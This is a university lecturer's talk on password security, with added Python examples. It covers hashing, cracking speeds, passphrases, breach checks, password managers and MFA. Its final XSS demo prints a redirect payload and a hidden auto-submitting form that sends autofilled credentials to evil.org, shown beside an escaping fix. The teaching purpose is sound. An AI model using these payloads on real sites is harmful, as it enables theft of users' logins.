Correct Horse Battery Staple

Passwords and other Fun

Introduction

Ethical Hacking @ CU

  • EH Degree for 15 or so years
  • Strong focus on Practical Aspects.
  • Excellent Student CTF team.

You teach What???

  • Cyber is essential for everyday lives.
  • Good guys who can think like the bad guys are a good thing.
  • If my folks break into your system and tell you how to fix it, it’s much better than the bad guys doing it.

What I Do

Underflow, Overflow, Use after free

But Its not just Hacking we teach

  • Security Operations.
  • Digital Forensics
  • Legal, Ethical and Business Factors
  • Network Security
  • Computer Science.

Fancy a Job?

  • Hard but Rewarding.
  • Not recruiting at the moment.
  • If you are interested, come and talk to me, ready for the next round.

Talk Overview

  • Talk about a common security issue: passwords
    • What they are
    • How we can choose good ones
    • Some of the things not to do.
  • Hack Some Things

Passwords

Passwords

History

  • Roman Empire: Watchwords
  • Prohibition: Get access to the pub

First Computer Passwords

  • Early 1960s: First computer passwords (CTSS at MIT)
    • To control access to a time-shared system and each user’s files.
  • 1962: The first password theft…
    • Users had a limited weekly time allocation.
    • Allan Scherr needed more time for his PhD.
    • Passwords were stored in plain text, so requesting a printout of the password file was all it took.

A Necessary Evil

  • Estimate we now have 100-150 passwords to remember
    • Biometrics / Keys / Certificate based auth trends
    • BUT: The easiest and most common fallback if these fail.

Don’t be green

  • Around 80% of hacking-related breaches involve reused, weak or stolen passwords (the often-quoted Verizon DBIR figure).

Most Common Passwords

  • What is the most common password
  • Off to seclists https://github.com/danielmiessler/SecLists/blob/master/Passwords/2023-200_most_used_passwords.txt

NCSC List (2019)

  • The 100,000 most commonly breached passwords, published by the NCSC together with Have I Been Pwned; 123456 topped it.

Storing Passwords

  • Hopefully not plain text
  • Hashes are used to store passwords
  • “Impossible” to reverse a hash value to get the password back: it is a one-way function, so the server stores hash(password) and recomputes it at login
  • Not all hashes are equal: a fast, unsalted MD5 or SHA-1 of a common password can be looked up in a precomputed table; a salted, deliberately slow password hash (bcrypt, scrypt, Argon2, PBKDF2) cannot

Hashing Issue

  • To CyberChef: hash a common password with MD5 or SHA-1…
  • To CrackStation: paste the hash in and get the password straight back
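To make the CyberChef / CrackStation point concrete, here is an added Python example (not part of the talk) that hashes common passwords the fast, unsalted way and reverses them by table lookup, then stores the same password with a per-user salt and a slow KDF so that no lookup table can help. The lookup table is a constructed three-entry stand-in for CrackStation (the digests in it are real); the PBKDF2 parameters follow OWASP guidance and are an assumption of the example, not something from the slides.

```python
"""Fast unsalted hashes vs a salted, slow password hash."""
import hashlib
import hmac
import os
from typing import Optional

# Constructed stand-in for CrackStation's lookup tables: a few real MD5 and
# SHA-1 digests of passwords that appear in every common-password list.
LOOKUP_TABLE = {
    "5f4dcc3b5aa765d61d8327deb882cf99": "password",          # md5
    "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8": "password",  # sha1
    "e10adc3949ba59abbe56e057f20f883e": "123456",            # md5
}


def fast_hash(password: str, algorithm: str = "md5") -> str:
    """What many sites still do: a fast, unsalted general-purpose hash."""
    return hashlib.new(algorithm, password.encode("utf-8")).hexdigest()


def lookup(digest: str) -> Optional[str]:
    """'Reverse' a fast unsalted hash by table lookup. Same password gives the
    same digest everywhere, so one precomputed table cracks every such site."""
    return LOOKUP_TABLE.get(digest.lower())


ITERATIONS = 600_000  # assumption: OWASP 2023 guidance for PBKDF2-HMAC-SHA256


def slow_hash(password: str, salt: Optional[bytes] = None) -> str:
    """Proper storage: a random per-user salt plus a deliberately slow KDF.
    The stored string carries everything verify_slow_hash() needs."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_slow_hash(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    _algo, iterations, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    for pw in ("password", "123456", "correct horse battery staple"):
        print(pw, "->", fast_hash(pw), "->", lookup(fast_hash(pw)))
    stored = slow_hash("password")
    print(stored)
    print("same password, different salt:", slow_hash("password") != stored)
```

Two identical passwords hashed with slow_hash() give two different stored strings, which is exactly what defeats a shared lookup table; the cost of each guess is then the KDF's, not MD5's.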

Password Strategies

So What makes a good password?

  • Suggestions?

Uppercase, Lowercase, Numbers and Symbols?

  • swordfish
  • Swordfish
  • Swordf1sh / Swordfish1
  • Swordf1sh!

Why this?

  • Trying to introduce complexity and make them harder to guess: every extra kind of character grows the alphabet
    • Lowercase == 26 letters
    • Upper + lower == 52
    • Add digits and common symbols and it is the 95 printable ASCII characters, roughly 100

Cracking Passwords

  • Try to guess the stored password: hash each candidate and compare with the stored hash
    • a, b, c, d
    • aa, ab, ac, ad ….
  • 2018 RTX 2080 ≈ 40 billion guesses a second
  • 2022 RTX 4090 ≈ 164 billion guesses a second
  • Both figures are for a fast unsalted hash such as MD5; against bcrypt the same card manages a few hundred thousand a second

More Complex == Harder to guess

Cracking Passwords

Obligatory XKCD

The Ideal Password

  • Nksi%c3&9#pZ$hn$jB9@bzf^1#ZKtnl1
  • Good luck remembering that

The 3 / 4 Words approach

  • Recommended by NCSC (their advice is “three random words”)
  • Pick 3 or 4 genuinely random words
  • Use these as a passphrase

Correct Horse Battery Staple

More XKCD

So We are safe right ?

That one’s in the list…

  • It depends on the password cracking strategy
  • If the attacker guesses letter by letter, then length is our friend: 25 lowercase letters is 26^25 candidates
  • If the attacker assumes the 4-words strategy, each word is one symbol and the wordlist is the alphabet
    • 170,000 words in the English dictionary
    • 4 random words is 170,000^4 ≈ 8 × 10^20 guesses, not 170,000 × 4: still years of GPU time
    • But people pick from a few thousand familiar words, and a famous phrase like this one is a single guess
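Added example (not from the slides) that works the arithmetic from the keyspace and cracking-rate slides and from the four-words sums above: how many candidates each style of password gives, and how long a 2080 or 4090 takes to exhaust them. The 40 and 164 billion per second figures are the slides’; the bcrypt and online-login rates are my assumptions, marked in the code. It also shows how a password manager or passphrase generator should draw its choices (the secrets module, uniformly from the alphabet or wordlist).

```python
"""Size of the search space and time to exhaust it at the quoted GPU rates."""
import math
import secrets
import string

# Guess rates from the slides (fast unsalted hash such as MD5).
RTX2080_PER_SEC = 40e9
RTX4090_PER_SEC = 164e9
# Assumptions, not from the slides: order-of-magnitude rates for a slow hash
# (bcrypt on the same card) and for guessing against a live login form.
BCRYPT_PER_SEC = 2e5
ONLINE_PER_SEC = 1e3

PRINTABLE = string.ascii_letters + string.digits + string.punctuation + " "  # 95 chars
DICTIONARY_WORDS = 170_000   # "the English dictionary" from the slides
XKCD_WORDS = 2048            # xkcd 936 assumes 11 bits per word
SECONDS_PER_YEAR = 365 * 24 * 3600


def keyspace(alphabet_size: int, length: int) -> int:
    """Candidates when each position is chosen uniformly from the alphabet.
    For a passphrase the 'alphabet' is the wordlist and 'length' the word count."""
    return alphabet_size ** length


def entropy_bits(space: int) -> float:
    return math.log2(space)


def seconds_to_exhaust(space: int, guesses_per_second: float) -> float:
    """Worst case for the attacker; on average they need half of this."""
    return space / guesses_per_second


def human_time(seconds: float) -> str:
    for name, size in (("years", SECONDS_PER_YEAR), ("days", 86400),
                       ("hours", 3600), ("minutes", 60)):
        if seconds >= size:
            return f"{seconds / size:,.1f} {name}"
    return f"{seconds:.1f} seconds"


def random_password(length: int, alphabet: str = PRINTABLE) -> str:
    """How a manager builds the 'ideal' password: secrets, never random."""
    return "".join(secrets.choice(alphabet) for _ in range(length))


def random_passphrase(wordlist: list, words: int = 4) -> str:
    """The four-words approach done properly: every word drawn uniformly."""
    return " ".join(secrets.choice(wordlist) for _ in range(words))


CASES = {
    "swordfish (9 lowercase letters)": keyspace(26, 9),
    "Swordf1sh! (10 printable chars)": keyspace(len(PRINTABLE), 10),
    "32 random printable chars": keyspace(len(PRINTABLE), 32),
    "4 random words from 170,000": keyspace(DICTIONARY_WORDS, 4),
    "4 random words from 2,048": keyspace(XKCD_WORDS, 4),
    "correcthorsebatterystaple (it is in the wordlist)": 1,
}

if __name__ == "__main__":
    for label, space in CASES.items():
        print(f"{label}: {entropy_bits(space):.1f} bits; "
              f"RTX 4090/MD5 {human_time(seconds_to_exhaust(space, RTX4090_PER_SEC))}, "
              f"bcrypt {human_time(seconds_to_exhaust(space, BCRYPT_PER_SEC))}, "
              f"online {human_time(seconds_to_exhaust(space, ONLINE_PER_SEC))}")
```

Running it shows the shape of the argument: nine lowercase letters fall in about half a minute on a 4090 against MD5, four words from a 2,048-word list in under two minutes (but centuries against an online login, which is the scenario the XKCD strip assumed), and four words from 170,000 or 32 random printable characters are out of reach at any of these rates.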

Phishing for Information

  • Rather than brute force, use social engineering
  • Folk like passwords to be meaningful to them
    • “Your porn star name” / Star Wars name quizzes harvest exactly the pet names, streets and birthdays people build passwords from
    • Numbers / symbols tacked on the end are only a speed bump: cracking tools apply “append 1”, “append !” and “1 for i” rules automatically

Being a bit sneaky?

  • Perhaps they have used the password before?
  • Of course that information is only available to l33t hax0rs, right? (It isn’t: breach dumps are traded openly, and Have I Been Pwned lets anyone check an email address or a password against them.)
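How the “have they used it before” check works in practice, as an added example that is not from the talk: the Have I Been Pwned range API takes only the first five hex characters of the password’s SHA-1 and returns every suffix in that bucket, so the password itself never leaves the machine. The API URL is real; the reply embedded below is a constructed sample (the suffix for "password" is real, the counts and the other two lines are made up) so the code runs offline, and the live fetcher is there for anyone who wants to try it.

```python
"""Check a password against breach data without sending it (k-anonymity)."""
import hashlib
from typing import Callable, Tuple
from urllib.request import Request, urlopen

RANGE_URL = "https://api.pwnedpasswords.com/range/"


def sha1_prefix_suffix(password: str) -> Tuple[str, str]:
    """Split the upper-case hex SHA-1 into the 5-char prefix that is sent
    and the 35-char suffix that stays local."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]


def fetch_range_live(prefix: str) -> str:
    """Real Have I Been Pwned range endpoint: only the prefix leaves your machine."""
    req = Request(RANGE_URL + prefix, headers={"User-Agent": "password-talk-demo"})
    with urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8")


# Constructed stand-in for the API's reply for prefix 5BAA6, so this runs
# offline. The middle suffix is the real SHA-1 tail of "password"; its count
# and the other two lines are made up for the example.
SAMPLE_RANGE_RESPONSE = "\r\n".join([
    "1D72CD07550416C216D8AD296BF5C0AE8E0:10",
    "1E4C9B93F3F0682250B6CF8331B7EE68FD8:10434004",
    "1F2B668E8AABEF1C59E9EC6F82E3F3CD786:2",
])


def pwned_count(password: str,
                fetch_range: Callable[[str], str] = fetch_range_live) -> int:
    """How many times the password appears in the breach corpus (0 = not seen)."""
    prefix, suffix = sha1_prefix_suffix(password)
    for line in fetch_range(prefix).splitlines():
        candidate, _, count = line.strip().partition(":")
        if candidate.upper() == suffix:
            return int(count or 0)
    return 0


if __name__ == "__main__":
    offline = lambda prefix: SAMPLE_RANGE_RESPONSE
    for pw in ("password", "correct horse battery staple"):
        print(pw, "seen", pwned_count(pw, offline), "times")
```

A signup form that calls pwned_count() and rejects anything with a non-zero count is the cheapest defence against the reuse problem on this slide; the same check is what a good password manager runs over its own vault.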

A Better Approach.

Password Managers

  • Personally, I recommend a password manager
    • Remember one or two passwords.
    • Rest are randomly generated (so strong)
    • Will also avoid re-use.

Password Managers

  • Lots of choice.
  • Still a healthy debate over the wisdom of keeping everything in one desirable target
  • Please keep autofill turned off: make the manager ask before it fills a form (the reason follows in the XSS demo)

MFA

  • We should also use MFA
  • Phone app, hardware key or similar used alongside the password
  • A second proof at login: a one-time code, a push approval, or a challenge-response with a key

MFA

  • Extra layer of defence, but not without its own problems.
    • Can be a PITA.
    • Buildings that are Faraday cages: no signal, so no SMS code or push notification
    • Not 100% secure: one-time codes can be phished and relayed in real time, and SMS can be SIM-swapped
  • Of course, if your phone with the password manager and the authenticator app on it gets stolen…

A Bit of Fun

Stealing Passwords from a Password Manager

  • Combining a web vuln with password-manager autofill to snarf credentials
  • The vulnerable code is the classic sort of thing GPT / students write.

The Issue

  • Cross Site Scripting (XSS)
  • The site puts my input into its page without escaping it, so I can inject markup and script that runs in your browser, on that site’s origin

Version 1: Redirect

  • The Classic “My Facebook got hacked”
  • Ask the browser to load a different Page
<script>window.location="http://evil.org"</script>

Version 2: Fake login Page

  • Password manager detects login fields on the page
  • Looks at the site URL and checks for known passwords for that domain
  • Offers to fill them, or (worse) auto-fills them without asking

Version 3: Hidden Login Page.

  • That’s a bit noticeable though.
  • We can hide the fake form from the user (off-screen, zero size), but the browser and the password manager still see it and fill it in.
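The server side of the bug, as an added Python example (not the talk’s demo code): a comment box that pastes user input straight into the page, beside the one-line fix. The page template is constructed; the redirect payload is the one from the slide, and the hidden-form payload is an illustration of version 3 (off-screen login fields plus a delayed submit) assumed here rather than taken from the talk.

```python
"""Stored/reflected XSS: the vulnerable render beside the fixed one."""
import html

# Constructed page template for a comments box; {comment} is the untrusted part.
PAGE_TEMPLATE = (
    "<!doctype html><html><body>\n"
    "<h1>Comments</h1>\n"
    "<p class=\"comment\">{comment}</p>\n"
    "</body></html>\n"
)

# The redirect is the payload on the slide. The hidden form is a constructed
# illustration of 'version 3': off-screen username/password fields the user
# never sees, which a password manager with autofill on will fill, then a
# delayed submit posts them to the attacker.
REDIRECT_PAYLOAD = '<script>window.location="http://evil.org"</script>'
HIDDEN_FORM_PAYLOAD = (
    '<div style="position:absolute;left:-9999px">'
    '<form action="https://evil.org/collect" method="post">'
    '<input name="username" autocomplete="username">'
    '<input name="password" type="password" autocomplete="current-password">'
    '</form></div>'
    '<script>setTimeout(function(){document.forms[0].submit()},2000)</script>'
)


def render_comment_vulnerable(comment: str) -> str:
    """The 'GPT / student' version: untrusted text pasted straight into HTML."""
    return PAGE_TEMPLATE.replace("{comment}", comment)


def render_comment_fixed(comment: str) -> str:
    """Same page, with the comment HTML-escaped for the element-body context,
    so < > & and quotes become entities and the browser renders them as text."""
    return PAGE_TEMPLATE.replace("{comment}", html.escape(comment, quote=True))


def contains_active_markup(page: str) -> bool:
    """Crude check: does the rendered page contain a live tag from a payload?"""
    lowered = page.lower()
    return "<script" in lowered or "<form" in lowered or "<input" in lowered


if __name__ == "__main__":
    for name, payload in (("redirect", REDIRECT_PAYLOAD),
                          ("hidden form", HIDDEN_FORM_PAYLOAD)):
        print(name,
              "vulnerable:", contains_active_markup(render_comment_vulnerable(payload)),
              "fixed:", contains_active_markup(render_comment_fixed(payload)))
```

html.escape is right for text inside an element body; inside an attribute, a URL or a script block the correct encoding differs, which is why a templating engine with autoescaping on (Jinja2, Django templates) beats hand-escaping. Escaping closes the injection; the password manager’s autofill is the other half of the chain, which is why keeping autofill off matters even on sites you trust.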

Summary

Summary

  • Passwords are an essential part of life
  • Often easily guessable
  • How to make them hard to guess, but easy to remember?

Summary

  • Longer is Better
  • Don’t Reuse
  • Avoid common words

Summary

  • A password manager isn’t ideal, but it’s a good compromise
    • Makes it easy to have long, random passwords
    • Avoids Re-use
  • MFA is also a great idea.